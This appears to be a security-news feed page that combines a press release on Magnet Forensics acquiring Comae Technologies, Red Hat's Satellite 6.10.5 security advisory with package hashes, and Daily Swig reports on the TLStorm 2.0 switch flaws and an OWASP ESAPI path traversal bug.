The company will continue the development of Comae’s memory analysis platform and seek to incorporate its capabilities into existing solutions

WATERLOO, Ontario--(BUSINESS WIRE)--Magnet Forensics (TSX: MAGT), a developer of digital investigation solutions for more than 4,000 enterprises and public safety organizations in over 100 countries, today announced the acquisition of the strategic IP assets of Comae Technologies, a cybersecurity firm that specializes in incident response and memory analysis. As part of the acquisition, Comae founder Matt Suiche will lead a memory analysis and incident response research and development team at Magnet Forensics, where he will further develop a memory analysis platform and integrate the technology into the company’s existing solutions. Suiche’s team at Comae will also work closely with Magnet Forensics going forward.

Comae is a UAE-based cybersecurity company that specializes in cloud-based memory analysis used to recover evidence from the volatile memory of devices. The acquisition will allow Magnet Forensics to accelerate the development of the memory analysis platform within the Magnet Idea Lab, an incubator made up of hundreds of investigators and analysts from leading police agencies and enterprises.

“Memory analysis plays a critical role in incident response investigations because it allows enterprises and public safety agencies to recover buried evidence and understand what happened on devices involved in cyber incidents," said Adam Belsher, chief executive officer of Magnet Forensics. “Very few organizations have the expertise and knowledge to develop memory analysis solutions. With Comae’s platform and the help of its memory analysis experts, Magnet Forensics can address a growing need for our customers while continuing to build on our comprehensive digital investigation platforms.”

Enterprises and police agencies are both looking to use memory analysis to respond to increases in the volume and complexity of cyber incidents. For enterprises, memory analysis can be the key to identifying the compromised devices in a malware or ransomware attack. In a digital investigation, analysts will often examine memory first because it can reveal the infection vectors and post-compromise activities of cyber incidents. It can also help analysts identify modern malware variants. Memory analysis can provide the same benefits to police agencies in their cybercrime investigations and give them another avenue to recover evidence from devices involved in cyber enabled crimes such as homicides, human trafficking, terrorism and organized crime.

Comae was founded in 2016 by Suiche, one of the world’s leading experts on memory analysis and incident response. Prior to founding Comae, Suiche founded two other firms: CloudVolumes, an application virtualization company that was acquired by VMware in 2014 and MoonSols, a digital forensics and incident response enterprise. Suiche, who began regularly presenting at international security conferences as a teenager, has also held a research position with the Netherlands Forensic Institute, which works alongside public safety agencies to combat cybercrime.

“Magnet Forensics is widely recognized in the digital forensics and incident response industry for its innovative solutions, which are proving to be increasingly pivotal in protecting public safety, and the leading talent developing them,” said Suiche, Magnet Forensics’ director, memory and incident response research and development. “My team and I are thrilled to be continuing our work alongside the team at Magnet Forensics, where the incident response technology can help protect thousands of enterprises and communities from cybercrime.”

**About Magnet Forensics**

Founded in 2010, Magnet Forensics is a developer of digital investigation software that acquires, analyzes, reports on, and manages evidence from digital sources, including computers, mobile devices, IoT devices and cloud services. Magnet Forensics’ software is used by more than 4,000 public and private sector customers in over 100 countries and helps investigators fight crime, protect assets and guard national security.

Magnet Forensics Acquires Cybersecurity Software Firm Comae Technologies

Red Hat Security Advisory 2022-1708-01 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Satellite 6.10.5 Async Bug Fix Update  
Advisory ID:       RHSA-2022:1708-01  
Product:           Red Hat Satellite 6  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:1708  
Issue date:        2022-05-04  
CVE Names:         CVE-2021-27023 CVE-2021-27025  
====================================================================  
1. Summary:

Updated Satellite 6.10 packages that fix several bugs are now available for  
Red Hat Satellite.

2. Relevant releases/architectures:

Red Hat Satellite 6.10 - noarch, x86_64  
Red Hat Satellite Capsule 6.10 - noarch, x86_64

3. Description:

Red Hat Satellite is a system management solution that allows organizations  
to configure and maintain their systems without the necessity to provide  
public Internet access to their servers or other client systems. It  
performs provisioning and configuration management of predefined standard  
operating environments.

Security Fix(es):

2023859  puppet: unsafe HTTP redirect (CVE-2021-27023)  
2023853  puppet: silent configuration failure in agent (CVE-2021-27025)

This update fixes the following bugs:

2070996  Upgrade to Satellite 6.10 fails at db:migrate stage if there are  
errata reference present for some ostree\puppet type repos  
2070991  Warning: postgresql.service changed on disk, when calling  
foreman-maintain service restart  
2071004  Config report upload failed with No smart proxy server found on  
[capsule.example.com] and is not in trusted_hosts  
2070984  Uploading external  DISA SCAP content to satellite 6.10 fails with  
exception Invalid SCAP file type  
2075031  Content Import does not delete version on failure  
2070985  Upgrading from Satellite 6.9 to Satellite 6.10.3 fails with error  
undefined method operatingsystems for nil:NilClass during the db:migrate  
step  
2070994  Index content is creating duplicated errata in katello_erratum  
table after upgrading to Satellite 6.10  
2070999  Fail to import contents when the connected and disconnected  
Satellite have different product labels for the same product  
2071002  Error when importing content and same package belongs to multiple  
repositories  
2071006  Content not accessible after importing  
2076979  Wrong satellite version on login screen  
2077046  Upgrade fails during db:migrate with PG::ForeignKeyViolation:  
ERROR:  update or delete on table katello_errata violates foreign key  
constraint katello_content_facet_errata_errata_id

Users of Red Hat Satellite are advised to upgrade to these updated  
packages, which fix these bugs.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For detailed instructions how to apply this update, refer to:

https://access.redhat.com/documentation/en-us/red_hat_satellite/6.10/html/upgrading_and_updating_red_hat_satellite/updating_satellite_server_capsule_server_and_content_hosts

5. Bugs fixed (https://bugzilla.redhat.com/):

2023853 - CVE-2021-27025 puppet: silent configuration failure in agent  
2023859 - CVE-2021-27023 puppet: unsafe HTTP redirect  
2070984 - Uploading external  DISA SCAP content to satellite 6.10 fails with exception "Invalid SCAP file type"  
2070985 - Upgrading from Satellite 6.9 to Satellite 6.10.3 fails with error "undefined method operatingsystems' for nil:NilClass" during the db:migrate step  
2070991 - Warning: postgresql.service changed on disk, when calling foreman-maintain service restart  
2070994 - Index content is creating duplicated errata in "katello_erratum" table after upgrading to Satellite 6.10  
2070996 - Upgrade to Satellite 6.10 fails at db:migrate stage if there are errata reference present for some ostree\puppet type repos  
2070999 - Fail to import contents when the connected and disconnected Satellite have different product labels for the same product  
2071002 - Error when importing content and same package belongs to multiple repositories  
2071004 - Config report upload failed with "No smart proxy server found on ["capsule.example.com"] and is not in trusted_hosts"  
2071006 - Content not accessible after importing  
2075031 - Content Import does not delete version on failure  
2076979 - Wrong satellite version on login screen  
2077046 - Upgrade fails during db:migrate with PG::ForeignKeyViolation: ERROR:  update or delete on table "katello_errata" violates foreign key constraint "katello_content_facet_errata_errata_id"

6. Package List:

Red Hat Satellite Capsule 6.10:

Source:  
foreman-2.5.2.21-1.el7sat.src.rpm  
foreman-installer-2.5.2.14-1.el7sat.src.rpm  
puppet-agent-6.26.0-1.el7sat.src.rpm  
puppetserver-6.18.0-1.el7sat.src.rpm  
satellite-6.10.5-1.el7sat.src.rpm  
tfm-rubygem-smart_proxy_openscap-0.9.2-1.el7sat.src.rpm

noarch:  
foreman-debug-2.5.2.21-1.el7sat.noarch.rpm  
foreman-installer-2.5.2.14-1.el7sat.noarch.rpm  
foreman-installer-katello-2.5.2.14-1.el7sat.noarch.rpm  
puppetserver-6.18.0-1.el7sat.noarch.rpm  
satellite-capsule-6.10.5-1.el7sat.noarch.rpm  
satellite-common-6.10.5-1.el7sat.noarch.rpm  
tfm-rubygem-smart_proxy_openscap-0.9.2-1.el7sat.noarch.rpm

x86_64:  
puppet-agent-6.26.0-1.el7sat.x86_64.rpm

Red Hat Satellite 6.10:

Source:  
foreman-2.5.2.21-1.el7sat.src.rpm  
foreman-installer-2.5.2.14-1.el7sat.src.rpm  
puppet-agent-6.26.0-1.el7sat.src.rpm  
puppetserver-6.18.0-1.el7sat.src.rpm  
satellite-6.10.5-1.el7sat.src.rpm  
tfm-rubygem-katello-4.1.1.55-1.el7sat.src.rpm  
tfm-rubygem-smart_proxy_openscap-0.9.2-1.el7sat.src.rpm

noarch:  
foreman-2.5.2.21-1.el7sat.noarch.rpm  
foreman-cli-2.5.2.21-1.el7sat.noarch.rpm  
foreman-debug-2.5.2.21-1.el7sat.noarch.rpm  
foreman-dynflow-sidekiq-2.5.2.21-1.el7sat.noarch.rpm  
foreman-ec2-2.5.2.21-1.el7sat.noarch.rpm  
foreman-gce-2.5.2.21-1.el7sat.noarch.rpm  
foreman-installer-2.5.2.14-1.el7sat.noarch.rpm  
foreman-installer-katello-2.5.2.14-1.el7sat.noarch.rpm  
foreman-journald-2.5.2.21-1.el7sat.noarch.rpm  
foreman-libvirt-2.5.2.21-1.el7sat.noarch.rpm  
foreman-openstack-2.5.2.21-1.el7sat.noarch.rpm  
foreman-ovirt-2.5.2.21-1.el7sat.noarch.rpm  
foreman-postgresql-2.5.2.21-1.el7sat.noarch.rpm  
foreman-service-2.5.2.21-1.el7sat.noarch.rpm  
foreman-telemetry-2.5.2.21-1.el7sat.noarch.rpm  
foreman-vmware-2.5.2.21-1.el7sat.noarch.rpm  
puppetserver-6.18.0-1.el7sat.noarch.rpm  
satellite-6.10.5-1.el7sat.noarch.rpm  
satellite-cli-6.10.5-1.el7sat.noarch.rpm  
satellite-common-6.10.5-1.el7sat.noarch.rpm  
tfm-rubygem-katello-4.1.1.55-1.el7sat.noarch.rpm  
tfm-rubygem-smart_proxy_openscap-0.9.2-1.el7sat.noarch.rpm

x86_64:  
puppet-agent-6.26.0-1.el7sat.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-27023  
https://access.redhat.com/security/cve/CVE-2021-27025  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYnKnOtzjgjWX9erEAQic5Q/+N6Bwi0LtZiqRXcdlPnzBnBoABWak8jy4  
tOTZXKuZPBii2rOK3HinScuJt/uExKHNZJmU3NISGd24kE27/EqeFe3/5G3oe6IH  
q13nWdBnJgzuFiXd8vIGUF0t8bs5X6Lt/8HMWPsJRkwTe240tebFuUFQGodlPLUu  
c8AM9KLewucQa5ACjS/SBIeO8eRcggT66gYZ4gCwPraoMNbWIjyFbaCIMoQZLkLR  
EfwGTxSa4Ltfamr+OU9iZ+BMwirzDCZMb6Vkr3WdHzKFefYoiL1CaP9gTARe0pW7  
Iw6uOm7y6OqaocwJE8FfITe9ZRALyh64B9UNQyK0HIkRbxtBiIwdwdzWuntJ5Mhx  
6M7b9kmrIubkj4BkEx/WGEq4N3a2ghXTkdgOnh5oOeam/IHAyMfHYbfyY+TdY3Na  
GXDqbcPOYIbdembAnM2V9UkwZH74TJ8/ZeIRrfnW3qOOLEM4yScbSWkREUSibR1y  
B5VAHEJr0q6FJxi4TnHMo+8Zg9Ai4j3D9mqs+0HHtwi5JMjjFXXVr7N06FqFu2u1  
2atNRecuGu9VxLxaJVT7rEEvN/YxdQ631qdwp9jCdh/25QBScaLiqgJM8y8iOURT  
2zOI+5yllnF2BNM8dIJMxH5NwMr1hrsqr/8ghs/S7AhSeJyRmx7vTsBu29qqA5A2  
oTFPriSDu8w=jAPv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-1708-01

Updated Satellite 6.10 packages that fix several bugs are now available for Red Hat Satellite.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-27023: puppet: unsafe HTTP redirect
* CVE-2021-27025: puppet: silent configuration failure in agent


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-05-04

Updated:

2022-05-04

**RHSA-2022:1708 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: Satellite 6.10.5 Async Bug Fix Update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

Updated Satellite 6.10 packages that fix several bugs are now available for Red Hat Satellite.

**Description**

Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.  

Security Fix(es):  

2023859 puppet: unsafe HTTP redirect (CVE-2021-27023)  
2023853 puppet: silent configuration failure in agent (CVE-2021-27025)  

This update fixes the following bugs:  

2070996 Upgrade to Satellite 6.10 fails at db:migrate stage if there are errata reference present for some ostree\\puppet type repos  
2070991 Warning: postgresql.service changed on disk, when calling foreman-maintain service restart  
2071004 Config report upload failed with No smart proxy server found on \[capsule.example.com\] and is not in trusted\_hosts  
2070984 Uploading external DISA SCAP content to satellite 6.10 fails with exception Invalid SCAP file type  
2075031 Content Import does not delete version on failure  
2070985 Upgrading from Satellite 6.9 to Satellite 6.10.3 fails with error undefined method operatingsystems for nil:NilClass during the db:migrate step  
2070994 Index content is creating duplicated errata in katello\_erratum table after upgrading to Satellite 6.10  
2070999 Fail to import contents when the connected and disconnected Satellite have different product labels for the same product  
2071002 Error when importing content and same package belongs to multiple repositories  
2071006 Content not accessible after importing  
2076979 Wrong satellite version on login screen  
2077046 Upgrade fails during db:migrate with PG::ForeignKeyViolation: ERROR: update or delete on table katello\_errata violates foreign key constraint katello\_content\_facet\_errata\_errata\_id  

Users of Red Hat Satellite are advised to upgrade to these updated packages, which fix these bugs.

**Affected Products**

*   Red Hat Satellite 6.10 x86\_64
*   Red Hat Satellite Capsule 6.10 x86\_64

**Fixes**

*   BZ - 2023853 - CVE-2021-27025 puppet: silent configuration failure in agent
*   BZ - 2023859 - CVE-2021-27023 puppet: unsafe HTTP redirect
*   BZ - 2070984 - Uploading external DISA SCAP content to satellite 6.10 fails with exception "Invalid SCAP file type"
*   BZ - 2070985 - Upgrading from Satellite 6.9 to Satellite 6.10.3 fails with error "undefined method operatingsystems' for nil:NilClass" during the db:migrate step
*   BZ - 2070991 - Warning: postgresql.service changed on disk, when calling foreman-maintain service restart
*   BZ - 2070994 - Index content is creating duplicated errata in "katello\_erratum" table after upgrading to Satellite 6.10
*   BZ - 2070996 - Upgrade to Satellite 6.10 fails at db:migrate stage if there are errata reference present for some ostree\\puppet type repos
*   BZ - 2070999 - Fail to import contents when the connected and disconnected Satellite have different product labels for the same product
*   BZ - 2071002 - Error when importing content and same package belongs to multiple repositories
*   BZ - 2071004 - Config report upload failed with "No smart proxy server found on \["capsule.example.com"\] and is not in trusted\_hosts"
*   BZ - 2071006 - Content not accessible after importing
*   BZ - 2075031 - Content Import does not delete version on failure
*   BZ - 2076979 - Wrong satellite version on login screen
*   BZ - 2077046 - Upgrade fails during db:migrate with PG::ForeignKeyViolation: ERROR: update or delete on table "katello\_errata" violates foreign key constraint "katello\_content\_facet\_errata\_errata\_id"

**Red Hat Satellite 6.10**

SRPM

foreman-2.5.2.21-1.el7sat.src.rpm

SHA-256: 94bbde824a8855f9273d379b458d106f9a2620910f643b4bf58f5425f3da18c4

foreman-installer-2.5.2.14-1.el7sat.src.rpm

SHA-256: 241bb066308417504ddcbe1f5dc2c80e159e7adba51914577ee41f7968e3844b

puppet-agent-6.26.0-1.el7sat.src.rpm

SHA-256: 4b54010a91ee8ffafe075b64c4003ad988d42c9316766dddd1fa73fcb4e25bfd

puppetserver-6.18.0-1.el7sat.src.rpm

SHA-256: dcb912fb60c55732164584ac91ab58a4c55f09f197d4dba7e7cbf386aa6477f5

satellite-6.10.5-1.el7sat.src.rpm

SHA-256: eb2184e8560a7764d94c9e8f0ab73ff274eda850ad681cb8cbf5ffa5106d438b

tfm-rubygem-katello-4.1.1.55-1.el7sat.src.rpm

SHA-256: 6af276213dceb299a4480cad86d959573be0bd6cba7cae777dd70eb8a7ebe502

tfm-rubygem-smart\_proxy\_openscap-0.9.2-1.el7sat.src.rpm

SHA-256: dab252cfca589d1d043b2dafa501aa4dfd7a43549ced1d9a27f812a379420364

x86\_64

foreman-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 33dc9e069a4b8115ccd69f58318e950339aed463c93a5d3951c0647188a53f80

foreman-cli-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: f59de9f57d06fae2de770a88da1b3265345383c68251b57573c7edf900ba501e

foreman-debug-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: d0587e4af58ad327338862d34cd8a150c085801bed88a593a0a5248def480914

foreman-dynflow-sidekiq-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: bdff5898e6af0e46c00f62de6f3043b2cde0d771f276ff24827271420d09ec33

foreman-ec2-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 9ba70bf37f0a66a3c7d35a2590a8b5a209a7248f9b46fa0b76b698c4eb1497b8

foreman-gce-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 496255bd7a87a1c3996e17199e89a00a899688a766b03861cd670a9506b47c87

foreman-installer-2.5.2.14-1.el7sat.noarch.rpm

SHA-256: eeeda268f26b26b01d661077640c661c3fd9e2723b0fbcf116f3e4ba6a11121a

foreman-installer-katello-2.5.2.14-1.el7sat.noarch.rpm

SHA-256: de5528b21941eaef123f8e611395d4319d060d69131413dee287c9afddf28ac9

foreman-journald-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 6d558f6ea02fb6d62ed4c2a0a211de14f133a344a3003cafd3cf02eed675e44e

foreman-libvirt-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 25579fd4c50c6758471917d6b6823ab6d7528fc6a2aafa38febe49991efa570d

foreman-openstack-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 3cad0d6ba92e47561422eb1874bdd991011671087244a02af50fb30d1c6b6358

foreman-ovirt-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 6143996888c8dccb74efbeed6de9c15aee5eb6e97b2a7969e56b051c1894d9cd

foreman-postgresql-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: bf9200100e4f5a6757bb4311a4f32caf29bb178d4f460ff8ca25a537cfd52f35

foreman-service-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: de90508801bdcf8b395e34da42f5544616c1fedacafb28fbb1583ea5f970ca81

foreman-telemetry-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 4ea5d1f9de8606d7fb8bdd66684a8811322e101f4e85d34fff326dddb724d590

foreman-vmware-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: 40ea8f4ce72551b3f6d1536e02c4bac30b809fe0165b081a88e78521458b196e

puppet-agent-6.26.0-1.el7sat.x86\_64.rpm

SHA-256: 6cb336f7438068db6128648f43bf826a8a3b096954f92537d4eaefe286304e06

puppetserver-6.18.0-1.el7sat.noarch.rpm

SHA-256: 301cc35fd03649ac293d782020a71b3e5d158ddbedea043d3cc90754670587f3

satellite-6.10.5-1.el7sat.noarch.rpm

SHA-256: e3ee11a8212e0b0b4779f3499e44a30569d8e100223f25145d6de91f3d169b7a

satellite-cli-6.10.5-1.el7sat.noarch.rpm

SHA-256: d0c83acacff1dbd98c61011da2bd165aad2f74d05f7b819c3f1cc9de34d544f5

satellite-common-6.10.5-1.el7sat.noarch.rpm

SHA-256: e389405300e1d6feb82ce4c32d41dfeb0fa88715fff1362ca2aa15dd97db6746

tfm-rubygem-katello-4.1.1.55-1.el7sat.noarch.rpm

SHA-256: 192ca6c89c938e2948a4f71d875439495338236dbd95df4dc4ef3dcd2d4fc728

tfm-rubygem-smart\_proxy\_openscap-0.9.2-1.el7sat.noarch.rpm

SHA-256: b3d1f792727a1481dfb6c49ae3249cf7aa640632fb26bb825dd384a188dcf125

**Red Hat Satellite Capsule 6.10**

SRPM

foreman-2.5.2.21-1.el7sat.src.rpm

SHA-256: 94bbde824a8855f9273d379b458d106f9a2620910f643b4bf58f5425f3da18c4

foreman-installer-2.5.2.14-1.el7sat.src.rpm

SHA-256: 241bb066308417504ddcbe1f5dc2c80e159e7adba51914577ee41f7968e3844b

puppet-agent-6.26.0-1.el7sat.src.rpm

SHA-256: 4b54010a91ee8ffafe075b64c4003ad988d42c9316766dddd1fa73fcb4e25bfd

puppetserver-6.18.0-1.el7sat.src.rpm

SHA-256: dcb912fb60c55732164584ac91ab58a4c55f09f197d4dba7e7cbf386aa6477f5

satellite-6.10.5-1.el7sat.src.rpm

SHA-256: eb2184e8560a7764d94c9e8f0ab73ff274eda850ad681cb8cbf5ffa5106d438b

tfm-rubygem-smart\_proxy\_openscap-0.9.2-1.el7sat.src.rpm

SHA-256: dab252cfca589d1d043b2dafa501aa4dfd7a43549ced1d9a27f812a379420364

x86\_64

foreman-debug-2.5.2.21-1.el7sat.noarch.rpm

SHA-256: d0587e4af58ad327338862d34cd8a150c085801bed88a593a0a5248def480914

foreman-installer-2.5.2.14-1.el7sat.noarch.rpm

SHA-256: eeeda268f26b26b01d661077640c661c3fd9e2723b0fbcf116f3e4ba6a11121a

foreman-installer-katello-2.5.2.14-1.el7sat.noarch.rpm

SHA-256: de5528b21941eaef123f8e611395d4319d060d69131413dee287c9afddf28ac9

puppet-agent-6.26.0-1.el7sat.x86\_64.rpm

SHA-256: 6cb336f7438068db6128648f43bf826a8a3b096954f92537d4eaefe286304e06

puppetserver-6.18.0-1.el7sat.noarch.rpm

SHA-256: 301cc35fd03649ac293d782020a71b3e5d158ddbedea043d3cc90754670587f3

satellite-capsule-6.10.5-1.el7sat.noarch.rpm

SHA-256: 53314b75b2429a04e1ac3f8e74bc900f821cb0e2e249779cd88421841968d86d

satellite-common-6.10.5-1.el7sat.noarch.rpm

SHA-256: e389405300e1d6feb82ce4c32d41dfeb0fa88715fff1362ca2aa15dd97db6746

tfm-rubygem-smart\_proxy\_openscap-0.9.2-1.el7sat.noarch.rpm

SHA-256: b3d1f792727a1481dfb6c49ae3249cf7aa640632fb26bb825dd384a188dcf125

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:1708: Red Hat Security Advisory: Satellite 6.10.5 Async Bug Fix Update

Patches issued for vulnerabilities arising from misuse of NanoSSL TLS library

Patches issued for vulnerabilities arising from misuse of NanoSSL TLS library

Critical security vulnerabilities in the implementation of TLS encryption in a raft of popular network switches have put millions of devices deployed in enterprise and critical infrastructure environments at risk.

Security researchers unearthed five remote code execution (RCE) vulnerabilities affecting various Aruba and Avaya devices that could result in the exfiltration of network traffic or sensitive information, as well as breakage of network segmentation and lateral movement to additional devices.

The vulnerable models are deployed in a variety of contexts, including airports, hospitals, and hotels.

Researchers from IoT security firm Armis said they had found no indication that the vulnerabilities have been exploited.

**TLStorm brewing**

Collectively dubbed ‘TLStorm 2.0’, the flaws arise from the misuse of Mocana’s NanoSSL TLS library, which accounted for another three vulnerabilities in other networking devices documented by Armis a few weeks ago.

Disclosed back in March, the ‘TLStorm 1.0’ flaws could enable attackers to cause physical damage to Schneider Electric’s APC Smart-UPS devices, which provide emergency backup power to network devices, as well as to connected devices.

DON’T MISS Security bug in VMWare Workspace ONE could allow access to internal, cloud networks

Several Aruba switch models – series 5400R, 3810, 2920, 2930F, 2930M, 2530, 2540 – are said to be vulnerable to two of the latest flaws.

Tracked as CVE-2022-23677, and with a near-maximum CVSS score of 9.0, an RCE issue arises from mishandled TLS connections on the RADIUS authentication client and captive portal, a login web page governing access to network resources.

Consequently, an attacker could potentially intercept the RADIUS connection via a manipulator-in-the-middle (MitM) attack to gain RCE over the switch with no user interaction.

Read more of the latest hardware security news

With a CVSS of 9.1, CVE-2022-23676 relates to two memory corruption vulnerabilities in the RADIUS client that lead to heap overflows of attacker-controlled data.

The other three RCE vulnerabilities are ‘zero-click’ issues affecting the web management portal of Avaya Series ERS3500, ERS3600, ERS4900, and ERS5900.

They include a pair of CVSS-9.8 rated issues, including a heap overflow (CVE-2022-29860) and stack overflow (CVE-2022-29861).

The third flaw, another heap overflow issue, affects a discontinued Avaya product line and therefore won’t be patched, although data allegedly shows that these devices can still be found in the wild, according to Armis.

**Patches and mitigations**

Most of the vulnerabilities have been patched, said Armis. A spokesperson for HPE, which owns Aruba, told The Daily Swig:

“HPE is aware of this issue, which impacts a limited number of switch models and firmware versions, and is working on a firmware update to address it. In the interim, we are advising customers using affected products to implement firewall controls to protect themselves. We are not aware of any exploitation of this vulnerability involving Aruba customers.

“For additional information, please see the security advisory.”

The Daily Swig has also invited Avaya researchers to comment. We will update this story if they respond.

**‘Yet to be found’**

Barak Hadad, head of research at Armis, told The Daily Swig that it was noteworthy that developers from three vendors, “working on completely different codebases, made the same mistake” in implementing NanoSSL incorrectly.

“We believe that other devices that misuse the NanoSSL library in the same way are yet to be found.”

He added that the TLStorm 2.0 flaws contradict the widely-held belief that network segmentation is “a bulletproof security mechanism”.

Armis researchers will discuss the TLStorm vulnerabilities at Black Hat Asia 2022 next week.

YOU MIGHT ALSO LIKE Path traversal flaw found in OWASP enterprise security testing library

<span>TLStorm 2.0: Millions of Aruba and Avaya network switches affected by RCE flaws</span>

Difficult-to-exploit ESAPI vulnerability offers best practice lessons

Difficult-to-exploit ESAPI vulnerability offers best practice lessons

The Open Web Application Security Project (OWASP) has fixed a vulnerability in its Enterprise Security API (ESAPI) that, if left unresolved, might have been abused to run path traversal attacks.

The issue, which involved the ESAPI validator interface and had a security severity rating of 7.5 out of 10, can be resolved by applying the patched 2.3.0.0 release.

OWASP ESAPI offers a utility that can help enterprise software developers to write more secure code by offering an interface that flags potential coding errors.

Although the vulnerable component would be hard to exploit, an update is nonetheless recommended since the potential impact is high, as an advisory by OWASP explains:

The default implementation of may incorrectly treat the tested input string as a child of the specified parent directory. This could potentially allow control-flow bypass checks to be defeated if an attack can specify the entire string representing the ‘input’ path.

**Limited impact**

OWASP ESAPI project co-leader Kevin Wall told _The Daily Swig_ that “most applications using ESAPI likely don’t even use the affected method” so the potential impact of the vulnerability is application specific.

“With all library vulnerabilities, it is hard to gauge how exposed a generic application is to exploit a vulnerability in a library.”

Wall added: “Even when that is used within an application, that still does not mean that it is exploitable within your application itself. You really have to analyze it on a case-by-case basis.”

Read more of the latest secure development news

According to Wall, in most use cases the vulnerable ESAPI would be used in conjunction with a web application firewall (WAF) or intrusion Detection software – factors further limiting the scope for harm.

On the question of severity, the software developer concluded: “I don’t think this is really a ‘high’ vulnerability, but that’s what we go have with because that’s what CVSSv3.1 spits out.”

**Lessons to learn**

While the vulnerability in play is unlikely to be exploited, and even less likely to cause much harm, the bug offers lessons for software developers, according to Wall.

For one thing, application developers using libraries should use a software composition analysis (SCA) tool and know its limits.

“Some SCA tools only find vulnerabilities reported in direct dependencies, but not in transitive dependencies,” Wall explained.

“And if you decide not to patch, then you need to do a deep-dive analysis to see exactly how the vulnerability in some library impacts your application and what types of mitigating controls you can put up (e.g., maybe ‘virtual patching’ via a WAF) to reduce the risk.”

**DON’T FORGET TO READ** NPM developer reputations could be leveraged to legitimize malicious software

The flaw may also be instructive for library developers because it illustrates the utility of static application security testing (SAST) tools.

“For library developers, run SAST tools of some sort and review the results, but also try to have adequate test coverage and at least do manual code reviews of the ‘git diffs’ when PRs are submitted but before they are merged,” Wall advised.

Although coding mistakes made in developing ESAPI led to the flaw, these were understandable mistakes, according to Wall.

He concluded: “I think the place where ESAPI dropped the ball is that there was no specific test that would have brought this to our attention and that’s on us, although I think in our defense, it was mostly the unawareness of everyone who previously touched that code that acts differently when a value for a directory is not ‘/’ terminated. I think that’s a bit unintuitive.”

**RECOMMENDED** Security bug in VMWare Workspace ONE could allow access to internal, cloud networks

Path traversal flaw found in OWASP enterprise security testing library

Difficult-to-exploit ESAPI vulnerability offers best practice lessons

The Open Web Application Security Project (OWASP) has fixed a vulnerability in its Enterprise Security API (ESAPI) that, if left unresolved, might have been abused to run path traversal attacks.

The issue, which involved the ESAPI validator interface and had a security severity rating of 7.5 out of 10, can be resolved by applying the patched 2.3.0.0 release.

OWASP ESAPI offers a library of security controls that can help enterprise software developers to write more secure code. The technology is designed to be embedded in (mostly web) applications as a proactive set of security measures.

Although the vulnerable component would be hard to exploit, an update is nonetheless recommended since the potential impact is high, as an advisory by OWASP explains:

The default implementation of may incorrectly treat the tested input string as a child of the specified parent directory. This could potentially allow control-flow bypass checks to be defeated if an attack can specify the entire string representing the ‘input’ path.

**Limited impact**

OWASP ESAPI project co-leader Kevin Wall told _The Daily Swig_ that “most applications using ESAPI likely don’t even use the affected method” so the potential impact of the vulnerability is application specific.

“With all library vulnerabilities, it is hard to gauge how exposed a generic application is to exploit a vulnerability in a library.”

